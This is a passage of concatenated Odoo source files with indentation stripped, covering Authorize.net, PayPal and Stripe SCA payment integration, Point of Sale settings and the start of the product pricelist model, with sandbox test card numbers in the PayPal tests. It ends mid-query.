etree.SubElement(tx, "transactionType").text = "authCaptureTransaction"
etree.SubElement(tx, "amount").text = str(amount)
profile = etree.SubElement(tx, "profile")
etree.SubElement(profile, "customerProfileId").text = token.authorize_profile
payment_profile = etree.SubElement(profile, "paymentProfile")
etree.SubElement(payment_profile, "paymentProfileId").text = token.acquirer_ref
order = etree.SubElement(tx, "order")
etree.SubElement(order, "invoiceNumber").text = reference[:20]
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'auth_capture'
return res
def authorize(self, token, amount, reference):
"""Authorize a payment for the given amount.
Authorize (without capture) a payment for the given payment.token
record for the specified amount with reference as communication.
:param record token: the payment.token record that must be charged
:param str amount: transaction amount (up to 15 digits with decimal point)
:param str reference: used as "invoiceNumber" in the Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "authOnlyTransaction"
etree.SubElement(tx, "amount").text = str(amount)
profile = etree.SubElement(tx, "profile")
etree.SubElement(profile, "customerProfileId").text = token.authorize_profile
payment_profile = etree.SubElement(profile, "paymentProfile")
etree.SubElement(payment_profile, "paymentProfileId").text = token.acquirer_ref
order = etree.SubElement(tx, "order")
etree.SubElement(order, "invoiceNumber").text = reference[:20]
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'auth_only'
return res
def capture(self, transaction_id, amount):
"""Capture a previously authorized payment for the given amount.
        Capture a previously authorized payment. Note that the amount is required
even though we do not support partial capture.
:param str transaction_id: id of the authorized transaction in the
Authorize.net backend
:param str amount: transaction amount (up to 15 digits with decimal point)
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "priorAuthCaptureTransaction"
etree.SubElement(tx, "amount").text = str(amount)
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'prior_auth_capture'
return res
def void(self, transaction_id):
"""Void a previously authorized payment.
:param str transaction_id: the id of the authorized transaction in the
Authorize.net backend
:return: a dict containing the response code, transaction id and transaction type
:rtype: dict
"""
root = self._base_tree('createTransactionRequest')
tx = etree.SubElement(root, "transactionRequest")
etree.SubElement(tx, "transactionType").text = "voidTransaction"
etree.SubElement(tx, "refTransId").text = transaction_id
response = self._authorize_request(root)
res = dict()
(has_error, error_msg) = error_check(response)
if has_error:
res['x_response_code'] = self.AUTH_ERROR_STATUS
res['x_response_reason_text'] = error_msg
return res
res['x_response_code'] = response.find('transactionResponse/responseCode').text
res['x_trans_id'] = response.find('transactionResponse/transId').text
res['x_type'] = 'void'
return res
# Test
def test_authenticate(self):
"""Test Authorize.net communication with a simple credentials check.
:return: True if authentication was successful, else False (or throws an error)
:rtype: bool
"""
test_auth = self._base_tree('authenticateTestRequest')
response = self._authorize_request(test_auth)
root = objectify.fromstring(response)
if root.find('{ns}messages/{ns}resultCode'.format(ns='{%s}' % XMLNS)) == 'Ok':
return True
return False
```
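
To make the error handling concrete, here is a small sketch that feeds a hand-written (illustrative, not real) Authorize.net error reply through `error_check()` from the module above; run it with that function in scope.

```python
from lxml import etree

# Hand-crafted failure reply, shaped like the responses error_check() expects.
error_reply = etree.fromstring(
    '<createTransactionResponse>'
    '<messages><resultCode>Error</resultCode>'
    '<message><code>E00027</code><text>The transaction was unsuccessful.</text></message>'
    '</messages>'
    '</createTransactionResponse>'
)
has_error, msg = error_check(error_reply)
print(has_error, msg)   # True E00027: The transaction was unsuccessful.
```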
#### File: payment_paypal/tests/test_paypal.py
```python
from odoo import fields
from odoo.addons.payment.models.payment_acquirer import ValidationError
from odoo.addons.payment.tests.common import PaymentAcquirerCommon
from odoo.addons.payment_paypal.controllers.main import PaypalController
from werkzeug import urls
from odoo.tools import mute_logger
from odoo.tests import tagged
from lxml import objectify
class PaypalCommon(PaymentAcquirerCommon):
def setUp(self):
super(PaypalCommon, self).setUp()
self.paypal = self.env.ref('payment.payment_acquirer_paypal')
# some CC
self.amex = (('378282246310005', '123'), ('371449635398431', '123'))
self.amex_corporate = (('378734493671000', '123'))
self.autralian_bankcard = (('5610591081018250', '123'))
self.dinersclub = (('30569309025904', '123'), ('38520000023237', '123'))
self.discover = (('6011111111111117', '123'), ('6011000990139424', '123'))
self.jcb = (('3530111333300000', '123'), ('3566002020360505', '123'))
self.mastercard = (('5555555555554444', '123'), ('5105105105105100', '123'))
self.visa = (('4111111111111111', '123'), ('4012888888881881', '123'), ('4222222222222', '123'))
self.dankord_pbs = (('76009244561', '123'), ('5019717010103742', '123'))
self.switch_polo = (('6331101999990016', '123'))
@tagged('post_install', '-at_install', 'external', '-standard')
class PaypalForm(PaypalCommon):
def test_10_paypal_form_render(self):
base_url = self.env['ir.config_parameter'].get_param('web.base.url')
# be sure not to do stupid things
self.paypal.write({'paypal_email_account': '<EMAIL>', 'fees_active': False})
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering
# ----------------------------------------
# render the button
res = self.paypal.render(
'test_ref0', 0.01, self.currency_euro.id,
values=self.buyer_values)
form_values = {
'cmd': '_xclick',
'business': '<EMAIL>',
'item_name': 'YourCompany: test_ref0',
'item_number': 'test_ref0',
'first_name': 'Norbert',
'last_name': 'Buyer',
'amount': '0.01',
'currency_code': 'EUR',
'address1': 'Huge Street 2/543',
'city': 'Sin City',
'zip': '1000',
'country': 'BE',
'email': '<EMAIL>',
'return': urls.url_join(base_url, PaypalController._return_url),
'notify_url': urls.url_join(base_url, PaypalController._notify_url),
'cancel_return': urls.url_join(base_url, PaypalController._cancel_url),
'custom': '{"return_url": "/payment/process"}',
}
# check form result
tree = objectify.fromstring(res)
data_set = tree.xpath("//input[@name='data_set']")
self.assertEqual(len(data_set), 1, 'paypal: Found %d "data_set" input instead of 1' % len(data_set))
self.assertEqual(data_set[0].get('data-action-url'), 'https://www.sandbox.paypal.com/cgi-bin/webscr', 'paypal: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit', 'data_set']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'paypal: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
def test_11_paypal_form_with_fees(self):
# be sure not to do stupid things
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# update acquirer: compute fees
self.paypal.write({
'fees_active': True,
'fees_dom_fixed': 1.0,
'fees_dom_var': 0.35,
'fees_int_fixed': 1.5,
'fees_int_var': 0.50,
})
# render the button
res = self.paypal.render(
'test_ref0', 12.50, self.currency_euro.id,
values=self.buyer_values)
# check form result
handling_found = False
tree = objectify.fromstring(res)
data_set = tree.xpath("//input[@name='data_set']")
self.assertEqual(len(data_set), 1, 'paypal: Found %d "data_set" input instead of 1' % len(data_set))
self.assertEqual(data_set[0].get('data-action-url'), 'https://www.sandbox.paypal.com/cgi-bin/webscr', 'paypal: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['handling']:
handling_found = True
self.assertEqual(form_input.get('value'), '1.57', 'paypal: wrong computed fees')
self.assertTrue(handling_found, 'paypal: fees_active did not add handling input in rendered form')
@mute_logger('odoo.addons.payment_paypal.models.payment', 'ValidationError')
def test_20_paypal_form_management(self):
# be sure not to do stupid things
self.assertEqual(self.paypal.environment, 'test', 'test without test environment')
# typical data posted by paypal after client has successfully paid
paypal_post_data = {
'protection_eligibility': u'Ineligible',
'last_name': u'Poilu',
'txn_id': u'08D73520KX778924N',
'receiver_email': u'dummy',
'payment_status': u'Pending',
'payment_gross': u'',
'tax': u'0.00',
'residence_country': u'FR',
'address_state': u'Alsace',
'payer_status': u'verified',
'txn_type': u'web_accept',
'address_street': u'Av. de la Pelouse, 87648672 Mayet',
'handling_amount': u'0.00',
'payment_date': u'03:21:19 Nov 18, 2013 PST',
'first_name': u'Norbert',
'item_name': u'test_ref_2',
'address_country': u'France',
'charset': u'windows-1252',
'custom': u'{"return_url": "/payment/process"}',
'notify_version': u'3.7',
'address_name': u'<NAME>',
'pending_reason': u'multi_currency',
'item_number': u'test_ref_2',
'receiver_id': u'dummy',
'transaction_subject': u'',
'business': u'dummy',
'test_ipn': u'1',
'payer_id': u'VTDKRZQSAHYPS',
'verify_sign': u'An5ns1Kso7MWUdW4ErQKJJJ4qi4-AVoiUf-3478q3vrSmqh08IouiYpM',
'address_zip': u'75002',
'address_country_code': u'FR',
'address_city': u'Paris',
'address_status': u'unconfirmed',
'mc_currency': u'EUR',
'shipping': u'0.00',
'payer_email': u'<EMAIL>',
'payment_type': u'instant',
'mc_gross': u'1.95',
'ipn_track_id': u'866df2ccd444b',
'quantity': u'1'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.env['payment.transaction'].form_feedback(paypal_post_data, 'paypal')
# create tx
tx = self.env['payment.transaction'].create({
'amount': 1.95,
'acquirer_id': self.paypal.id,
'currency_id': self.currency_euro.id,
'reference': 'test_ref_2',
'partner_name': '<NAME>',
'partner_country_id': self.country_france.id})
# validate it
tx.form_feedback(paypal_post_data, 'paypal')
# check
self.assertEqual(tx.state, 'pending', 'paypal: wrong state after receiving a valid pending notification')
self.assertEqual(tx.state_message, 'multi_currency', 'paypal: wrong state message after receiving a valid pending notification')
self.assertEqual(tx.acquirer_reference, '08D73520KX778924N', 'paypal: wrong txn_id after receiving a valid pending notification')
# update tx
tx.write({
'state': 'draft',
'acquirer_reference': False})
# update notification from paypal
paypal_post_data['payment_status'] = 'Completed'
# validate it
tx.form_feedback(paypal_post_data, 'paypal')
# check
self.assertEqual(tx.state, 'done', 'paypal: wrong state after receiving a valid pending notification')
self.assertEqual(tx.acquirer_reference, '08D73520KX778924N', 'paypal: wrong txn_id after receiving a valid pending notification')
self.assertEqual(fields.Datetime.to_string(tx.date), '2013-11-18 11:21:19', 'paypal: wrong validation date')
```
#### File: payment_stripe_sca/models/payment.py
```python
import logging
import requests
import pprint
from werkzeug import urls
from odoo import api, models, fields, _
from odoo.exceptions import ValidationError
from odoo.addons.payment_stripe_sca.controllers.main import StripeControllerSCA as StripeController
from odoo.addons.payment_stripe.models.payment import INT_CURRENCIES
from odoo.tools.float_utils import float_round
_logger = logging.getLogger(__name__)
class PaymentAcquirerStripeSCA(models.Model):
_inherit = "payment.acquirer"
def stripe_form_generate_values(self, tx_values):
self.ensure_one()
base_url = self.get_base_url()
stripe_session_data = {
"payment_method_types[]": "card",
"line_items[][amount]": int(
tx_values["amount"]
if tx_values["currency"].name in INT_CURRENCIES
else float_round(tx_values["amount"] * 100, 2)
),
"line_items[][currency]": tx_values["currency"].name,
"line_items[][quantity]": 1,
"line_items[][name]": tx_values["reference"],
"client_reference_id": tx_values["reference"],
"success_url": urls.url_join(base_url, StripeController._success_url)
+ "?reference=%s" % tx_values["reference"],
"cancel_url": urls.url_join(base_url, StripeController._cancel_url)
+ "?reference=%s" % tx_values["reference"],
"customer_email": tx_values["partner_email"] or tx_values["billing_partner_email"],
}
tx_values["session_id"] = self._create_stripe_session(stripe_session_data)
return tx_values
def _stripe_request(self, url, data=False, method="POST"):
self.ensure_one()
stripe_url = 'https://%s/' % (self._get_stripe_api_url())
url = urls.url_join(stripe_url, url)
headers = {
"AUTHORIZATION": "Bearer %s" % self.sudo().stripe_secret_key,
"Stripe-Version": "2019-05-16", # SetupIntent need a specific version
}
resp = requests.request(method, url, data=data, headers=headers)
try:
resp.raise_for_status()
except:
_logger.error(resp.text)
raise
return resp.json()
def _create_stripe_session(self, kwargs):
self.ensure_one()
resp = self._stripe_request("checkout/sessions", kwargs)
if resp.get("payment_intent") and kwargs.get("client_reference_id"):
tx = (
self.env["payment.transaction"]
.sudo()
.search([("reference", "=", kwargs["client_reference_id"])])
)
tx.stripe_payment_intent = resp["payment_intent"]
return resp["id"]
def _create_setup_intent(self, kwargs):
self.ensure_one()
params = {"usage": "off_session"}
_logger.info(
"_stripe_create_setup_intent: Sending values to stripe, values:\n%s",
pprint.pformat(params),
)
res = self._stripe_request("setup_intents", params)
_logger.info(
"_stripe_create_setup_intent: Values received:\n%s", pprint.pformat(res)
)
return res
@api.model
def stripe_s2s_form_process(self, data):
last4 = data.get("card", {}).get("last4")
if not last4:
# PM was created with a setup intent, need to get last4 digits through
# yet another call -_-
acquirer_id = self.env["payment.acquirer"].browse(int(data["acquirer_id"]))
pm = data.get("payment_method")
res = acquirer_id._stripe_request(
"payment_methods/%s" % pm, data=False, method="GET"
)
last4 = res.get("card", {}).get("last4", "****")
payment_token = (
self.env["payment.token"]
.sudo()
.create(
{
"acquirer_id": int(data["acquirer_id"]),
"partner_id": int(data["partner_id"]),
"stripe_payment_method": data.get("payment_method"),
"name": "XXXXXXXXXXXX%s" % last4,
"acquirer_ref": data.get("customer"),
}
)
)
return payment_token
def stripe_s2s_form_validate(self, data):
return True
class PaymentTransactionStripeSCA(models.Model):
_inherit = "payment.transaction"
stripe_payment_intent = fields.Char(
string="Stripe Payment Intent ID", readonly=True
)
stripe_payment_intent_secret = fields.Char(string='Stripe Payment Intent Secret', readonly=True)
def _get_json_fields(self):
res = super()._get_json_fields()
res.append('stripe_payment_intent_secret')
return res
def _get_processing_info(self):
res = super()._get_processing_info()
if self.acquirer_id.provider == 'stripe':
stripe_info = {
'stripe_payment_intent': self.stripe_payment_intent,
'stripe_payment_intent_secret': self.stripe_payment_intent_secret,
'stripe_publishable_key': self.acquirer_id.stripe_publishable_key,
}
res.update(stripe_info)
return res
def _create_stripe_charge(self, acquirer_ref=None, tokenid=None, email=None):
raise NotImplementedError(
"This method can no longer be used with the payment_stripe_sca module."
)
def form_feedback(self, data, acquirer_name):
if data.get("reference") and acquirer_name == "stripe":
transaction = self.env["payment.transaction"].search(
[("reference", "=", data["reference"])]
)
url = "payment_intents/%s" % transaction.stripe_payment_intent
resp = transaction.acquirer_id._stripe_request(url)
if resp.get("charges") and resp.get("charges").get("total_count"):
resp = resp.get("charges").get("data")[0]
data.update(resp)
_logger.info(
"Stripe: entering form_feedback with post data %s"
% pprint.pformat(data)
)
        # note: luckily, the base stripe module did not override this method, so we
        # don't need a context key to skip this call in the parent model
return super(PaymentTransactionStripeSCA, self).form_feedback(data, acquirer_name)
def _stripe_create_payment_intent(self, acquirer_ref=None, email=None):
if self.stripe_payment_intent:
_logger.info(
"_stripe_create_payment_intent: trying to create an intent when one already exists (tx #%s), refetching values for intent %s",
self.id, self.stripe_payment_intent
)
res = self.acquirer_id._stripe_request("payment_intents/%s" % self.stripe_payment_intent, method="GET")
_logger.info(
"_stripe_create_payment_intent: Values received:\n%s", pprint.pformat(res)
)
return res
if not self.payment_token_id.stripe_payment_method:
# old token before installing stripe_sca, need to fetch data from the api
self.payment_token_id._stripe_sca_migrate_customer()
charge_params = {
"amount": int(
self.amount
if self.currency_id.name in INT_CURRENCIES
else float_round(self.amount * 100, 2)
),
"currency": self.currency_id.name.lower(),
"confirm": True,
"off_session": True,
"payment_method": self.payment_token_id.stripe_payment_method,
"customer": self.payment_token_id.acquirer_ref,
"description": self.reference,
}
if not self.env.context.get('off_session'):
charge_params.update(setup_future_usage='off_session', off_session=False)
_logger.info(
"_stripe_create_payment_intent: Sending values to stripe, values:\n%s",
pprint.pformat(charge_params),
)
res = self.acquirer_id._stripe_request("payment_intents", charge_params)
if res.get("charges") and res.get("charges").get("total_count"):
res = res.get("charges").get("data")[0]
_logger.info(
"_stripe_create_payment_intent: Values received:\n%s", pprint.pformat(res)
)
return res
def stripe_s2s_do_transaction(self, **kwargs):
self.ensure_one()
result = self._stripe_create_payment_intent(
acquirer_ref=self.payment_token_id.acquirer_ref, email=self.partner_email
)
return self._stripe_s2s_validate_tree(result)
def _create_stripe_refund(self):
refund_params = {
"charge": self.acquirer_reference,
"amount": int(
float_round(self.amount * 100, 2)
), # by default, stripe refund the full amount (we don't really need to specify the value)
"metadata[reference]": self.reference,
}
_logger.info(
"_create_stripe_refund: Sending values to stripe URL, values:\n%s",
pprint.pformat(refund_params),
)
res = self.acquirer_id._stripe_request("refunds", refund_params)
_logger.info("_create_stripe_refund: Values received:\n%s", pprint.pformat(res))
return res
@api.model
def _stripe_form_get_tx_from_data(self, data):
""" Given a data dict coming from stripe, verify it and find the related
transaction record. """
reference = data.get("reference")
if not reference:
stripe_error = data.get("error", {}).get("message", "")
_logger.error(
"Stripe: invalid reply received from stripe API, looks like "
"the transaction failed. (error: %s)",
stripe_error or "n/a",
)
error_msg = _("We're sorry to report that the transaction has failed.")
if stripe_error:
error_msg += " " + (
_("Stripe gave us the following info about the problem: '%s'")
% stripe_error
)
error_msg += " " + _(
"Perhaps the problem can be solved by double-checking your "
"credit card details, or contacting your bank?"
)
raise ValidationError(error_msg)
tx = self.search([("reference", "=", reference)])
if not tx:
error_msg = _("Stripe: no order found for reference %s") % reference
_logger.error(error_msg)
raise ValidationError(error_msg)
elif len(tx) > 1:
error_msg = _("Stripe: %s orders found for reference %s") % (
len(tx),
reference,
)
_logger.error(error_msg)
raise ValidationError(error_msg)
return tx[0]
def _stripe_s2s_validate_tree(self, tree):
self.ensure_one()
if self.state not in ("draft", "pending"):
_logger.info(
"Stripe: trying to validate an already validated tx (ref %s)",
self.reference,
)
return True
status = tree.get("status")
tx_id = tree.get("id")
tx_secret = tree.get("client_secret")
vals = {"date": fields.datetime.now(), "acquirer_reference": tx_id, "stripe_payment_intent": tx_id, "stripe_payment_intent_secret": tx_secret}
if status == "succeeded":
self.write(vals)
self._set_transaction_done()
self.execute_callback()
if self.type == "form_save":
s2s_data = {
"customer": tree.get("customer"),
"payment_method": tree.get("payment_method"),
"card": tree.get("payment_method_details").get("card"),
"acquirer_id": self.acquirer_id.id,
"partner_id": self.partner_id.id,
}
token = self.acquirer_id.stripe_s2s_form_process(s2s_data)
self.payment_token_id = token.id
if self.payment_token_id:
self.payment_token_id.verified = True
return True
if status in ("processing", "requires_action"):
self.write(vals)
self._set_transaction_pending()
return True
else:
error = tree.get("failure_message")
            _logger.warning(error)
vals.update({"state_message": error})
self.write(vals)
self._set_transaction_cancel()
return False
def _stripe_form_get_invalid_parameters(self, data):
invalid_parameters = []
if data.get("amount") != int(
self.amount
if self.currency_id.name in INT_CURRENCIES
else float_round(self.amount * 100, 2)
):
invalid_parameters.append(("Amount", data.get("amount"), self.amount * 100))
if data.get("currency").upper() != self.currency_id.name:
invalid_parameters.append(
("Currency", data.get("currency"), self.currency_id.name)
)
if (
data.get("payment_intent")
and data.get("payment_intent") != self.stripe_payment_intent
):
invalid_parameters.append(
(
"Payment Intent",
data.get("payment_intent"),
self.stripe_payment_intent,
)
)
return invalid_parameters
class PaymentTokenStripeSCA(models.Model):
_inherit = "payment.token"
stripe_payment_method = fields.Char("Payment Method ID")
@api.model
def stripe_create(self, values):
if values.get("stripe_payment_method") and not values.get("acquirer_ref"):
partner_id = self.env["res.partner"].browse(values.get("partner_id"))
payment_acquirer = self.env["payment.acquirer"].browse(
values.get("acquirer_id")
)
            # create the customer on Stripe
customer_data = {"email": partner_id.email}
cust_resp = payment_acquirer._stripe_request("customers", customer_data)
# link customer with payment method
api_url_payment_method = (
"payment_methods/%s/attach" % values["stripe_payment_method"]
)
method_data = {"customer": cust_resp.get("id")}
payment_acquirer._stripe_request(api_url_payment_method, method_data)
return {"acquirer_ref": cust_resp["id"]}
return values
def _stripe_create_customer(self, token, description=None, acquirer_id=None):
raise NotImplementedError(
"This method can no longer be used with the payment_stripe_sca module."
)
def _stripe_sca_migrate_customer(self):
"""Migrate a token from the old implementation of Stripe to the SCA one.
In the old implementation, it was possible to create a valid charge just by
giving the customer ref to ask Stripe to use the default source (= default
        card). Since there is a one-to-one matching between a saved card and a customer,
        this used to work well - but now we need to specify the payment method for each
        call, so we have to contact Stripe to get the default source for the customer and save it
in the payment token.
This conversion will happen once per token, the first time it gets used following
the installation of the module."""
self.ensure_one()
url = "customers/%s" % (self.acquirer_ref)
data = self.acquirer_id._stripe_request(url, method="GET")
sources = data.get('sources', {}).get('data', [])
pm_ref = False
if sources:
if len(sources) > 1:
_logger.warning('stripe sca customer conversion: there should be a single saved source per customer!')
pm_ref = sources[0].get('id')
else:
url = 'payment_methods'
params = {
'type': 'card',
'customer': self.acquirer_ref,
}
payment_methods = self.acquirer_id._stripe_request(url, params, method='GET')
cards = payment_methods.get('data', [])
if len(cards) > 1:
_logger.warning('stripe sca customer conversion: there should be a single saved source per customer!')
pm_ref = cards and cards[0].get('id')
if not pm_ref:
raise ValidationError(_('Unable to convert Stripe customer for SCA compatibility. Is there at least one card for this customer in the Stripe backend?'))
self.stripe_payment_method = pm_ref
_logger.info('converted old customer ref to sca-compatible record for payment token %s', self.id)
```
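The refund payload and the form validation above convert the transaction amount to Stripe's integer minor units with `int(float_round(self.amount * 100, 2))`; the validation additionally skips the cent conversion for zero-decimal currencies listed in `INT_CURRENCIES`. A minimal standalone sketch of that conversion, assuming an illustrative `to_stripe_amount` helper and currency set that are not part of the module:
```python
# Standalone sketch of the amount conversion used in the Stripe payloads above.
# The helper name and the currency set are illustrative, not module API.
ZERO_DECIMAL_CURRENCIES = {"JPY", "KRW", "VND"}  # subset, for illustration only
def to_stripe_amount(amount, currency_name):
    """Convert a float amount to Stripe's integer minor units."""
    if currency_name in ZERO_DECIMAL_CURRENCIES:
        # zero-decimal currencies are charged in whole units
        return int(round(amount))
    # other currencies are expressed in cents; round to 2 decimals first to
    # avoid float artifacts such as 19.99 * 100 -> 1998.9999999999998
    return int(round(amount * 100, 2))
assert to_stripe_amount(19.99, "EUR") == 1999
assert to_stripe_amount(500, "JPY") == 500
```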
#### File: point_of_sale/models/res_config_settings.py
```python
from odoo import api, fields, models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
sale_tax_id = fields.Many2one('account.tax', string="Default Sale Tax", related='company_id.account_sale_tax_id', readonly=False)
module_pos_mercury = fields.Boolean(string="Integrated Card Payments", help="The transactions are processed by Vantiv. Set your Vantiv credentials on the related payment journal.")
pos_sales_price = fields.Boolean("Multiple Product Prices", config_parameter='point_of_sale.pos_sales_price')
pos_pricelist_setting = fields.Selection([
('percentage', 'Multiple prices per product (e.g. customer segments, currencies)'),
('formula', 'Price computed from formulas (discounts, margins, roundings)')
], string="POS Pricelists", config_parameter='point_of_sale.pos_pricelist_setting')
@api.onchange('pos_sales_price')
def _onchange_pos_sales_price(self):
if not self.pos_sales_price:
self.pos_pricelist_setting = False
if self.pos_sales_price and not self.pos_pricelist_setting:
self.pos_pricelist_setting = 'percentage'
@api.onchange('pos_pricelist_setting')
def _onchange_pos_pricelist_setting(self):
if self.pos_pricelist_setting == 'percentage':
self.update({
'group_product_pricelist': True,
'group_sale_pricelist': True,
'group_pricelist_item': False,
})
elif self.pos_pricelist_setting == 'formula':
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': True,
'group_pricelist_item': True,
})
else:
self.update({
'group_product_pricelist': False,
'group_sale_pricelist': False,
'group_pricelist_item': False,
})
```
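The `_onchange_pos_pricelist_setting` handler above is a plain mapping from the selected pricelist mode to three boolean feature groups. A sketch of the same dispatch as a lookup table; the names below are illustrative and not part of the point_of_sale module:
```python
# Illustrative table-driven equivalent of _onchange_pos_pricelist_setting above;
# the constant and function names are assumptions, not module API.
PRICELIST_GROUPS = {
    'percentage': {'group_product_pricelist': True, 'group_sale_pricelist': True, 'group_pricelist_item': False},
    'formula': {'group_product_pricelist': False, 'group_sale_pricelist': True, 'group_pricelist_item': True},
}
DEFAULT_GROUPS = {'group_product_pricelist': False, 'group_sale_pricelist': False, 'group_pricelist_item': False}
def groups_for_setting(setting):
    """Return the feature-group flags implied by a POS pricelist setting."""
    return PRICELIST_GROUPS.get(setting, DEFAULT_GROUPS)
assert groups_for_setting('formula')['group_pricelist_item'] is True
assert groups_for_setting(False) == DEFAULT_GROUPS
```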
#### File: point_of_sale/models/res_users.py
```python
from odoo import api, fields, models, _
from odoo.exceptions import UserError
class ResUsers(models.Model):
_inherit = 'res.users'
    pos_security_pin = fields.Char(string='Security PIN', size=32, help='A Security PIN used to protect sensitive functionality in the Point of Sale')
@api.constrains('pos_security_pin')
def _check_pin(self):
if self.pos_security_pin and not self.pos_security_pin.isdigit():
raise UserError(_("Security PIN can only contain digits"))
```
#### File: portal/tests/test_load_process.py
```python
import odoo.tests
@odoo.tests.tagged('post_install', '-at_install')
class TestUi(odoo.tests.HttpCase):
def test_01_portal_load_tour(self):
self.phantom_js(
"/",
"odoo.__DEBUG__.services['web_tour.tour'].run('portal_load_homepage')",
"odoo.__DEBUG__.services['web_tour.tour'].tours.portal_load_homepage.ready",
login="portal"
)
```
#### File: product/models/product_pricelist.py
```python
from itertools import chain
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError, ValidationError
from odoo.addons import decimal_precision as dp
from odoo.tools import pycompat
class Pricelist(models.Model):
_name = "product.pricelist"
_description = "Pricelist"
_order = "sequence asc, id desc"
def _get_default_currency_id(self):
return self.env.user.company_id.currency_id.id
def _get_default_item_ids(self):
ProductPricelistItem = self.env['product.pricelist.item']
vals = ProductPricelistItem.default_get(list(ProductPricelistItem._fields))
vals.update(compute_price='formula')
return [[0, False, vals]]
name = fields.Char('Pricelist Name', required=True, translate=True)
active = fields.Boolean('Active', default=True, help="If unchecked, it will allow you to hide the pricelist without removing it.")
item_ids = fields.One2many(
'product.pricelist.item', 'pricelist_id', 'Pricelist Items',
copy=True, default=_get_default_item_ids)
currency_id = fields.Many2one('res.currency', 'Currency', default=_get_default_currency_id, required=True)
company_id = fields.Many2one('res.company', 'Company')
sequence = fields.Integer(default=16)
country_group_ids = fields.Many2many('res.country.group', 'res_country_group_pricelist_rel',
'pricelist_id', 'res_country_group_id', string='Country Groups')
@api.multi
def name_get(self):
return [(pricelist.id, '%s (%s)' % (pricelist.name, pricelist.currency_id.name)) for pricelist in self]
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if name and operator == '=' and not args:
# search on the name of the pricelist and its currency, opposite of name_get(),
# Used by the magic context filter in the product search view.
query_args = {'name': name, 'limit': limit, 'lang': self._context.get('lang') or 'en_US'}
query = """SELECT p.id
FROM ((
SELECT pr.id, pr.name
FROM product_pricelist pr JOIN
res_currency cur ON
(pr.currency_id = cur.id)
WHERE pr.name || ' (' || cur.name || ')' = %(name)s
)
UNION (
SELECT tr.res_id as id, tr.value as name
FROM ir_translation tr JOIN
product_pricelist pr ON (
pr.id = tr.res_id AND
tr.type = 'model' AND
tr.name = 'product.pricelist,name' AND
tr.lang = %(lang)s
) JOIN
res_currency cur ON
(pr.currency_id = cur.id)
WHERE tr.value || ' (' || cur.name || ')' = %(name)s
)
) p
ORDER BY p.name"""
if limit:
query += " LIMIT %(limit)s"
self._cr.execute(query, query_args)
ids = [r[0] for r in self._cr.fetchall()]
# regular search() to apply ACLs - may limit results below limit in some cases
pricelist_ids = self._search([('id', 'in', ids)], limit=limit, access_rights_uid=name_get_uid)
if pricelist_ids:
return self.browse(pricelist_ids).name_get()
return super(Pricelist, self)._name_search(name, args, operator=operator, limit=limit, name_get_uid=name_get_uid)
def _compute_price_rule_multi(self, products_qty_partner, date=False, uom_id=False):
""" Low-level method - Multi pricelist, multi products
Returns: dict{product_id: dict{pricelist_id: (price, suitable_rule)} }"""
if not self.ids:
pricelists = self.search([])
else:
pricelists = self
results = {}
for pricelist in pricelists:
subres = pricelist._compute_price_rule(products_qty_partner, date=date, uom_id=uom_id)
for product_id, price in subres.items():
results.setdefault(product_id, {})
results[product_id][pricelist.id] = price
return results
@api.multi
def _compute_price_rule(self, products_qty_partner, date=False, uom_id=False):
""" Low-level method - Mono pricelist, multi products
Returns: dict{product_id: (price, suitable_rule) for the given pricelist}
Date in context can be a date, datetime, ...
        :param products_qty_partner: list of tuples (product, quantity, partner)
:param datetime date: validity date
:param ID uom_id: intermediate unit of measure
"""
self.ensure_one()
if not date:
date = self._context.get('date') or fields.Date.today()
date = fields.Date.to_date(date) # boundary conditions differ if we have a datetime
if not uom_id and self._context.get('uom'):
uom_id = self._context['uom']
if uom_id:
# rebrowse with uom if given
products = [item[0].with_context(uom=uom_id) for item in products_qty_partner]
products_qty_partner = [(products[index], data_struct[1], data_struct[2]) for index, data_struct in enumerate(products_qty_partner)]
else:
products = [item[0] for item in products_qty_partner]
if not products:
return {}
categ_ids = {}
for p in products:
categ = p.categ_id
while categ:
categ_ids[categ.id] = True
categ = categ.parent_id
categ_ids = list(categ_ids)
is_product_template = products[0]._name == "product.template"
if is_product_template:
prod_tmpl_ids = [tmpl.id for tmpl in products]
# all variants of all products
prod_ids = [p.id for p in
list(chain.from_iterable([t.product_variant_ids for t in products]))]
else:
prod_ids = [product.id for product in products]
prod_tmpl_ids = [product.product_tmpl_id.id for product in products]
# Load all rules
self._cr.execute(
'SELECT item.id '
'FROM product_pricelist_item AS item '
'LEFT JOIN product_category AS categ '
'ON item.categ_id = categ.id '
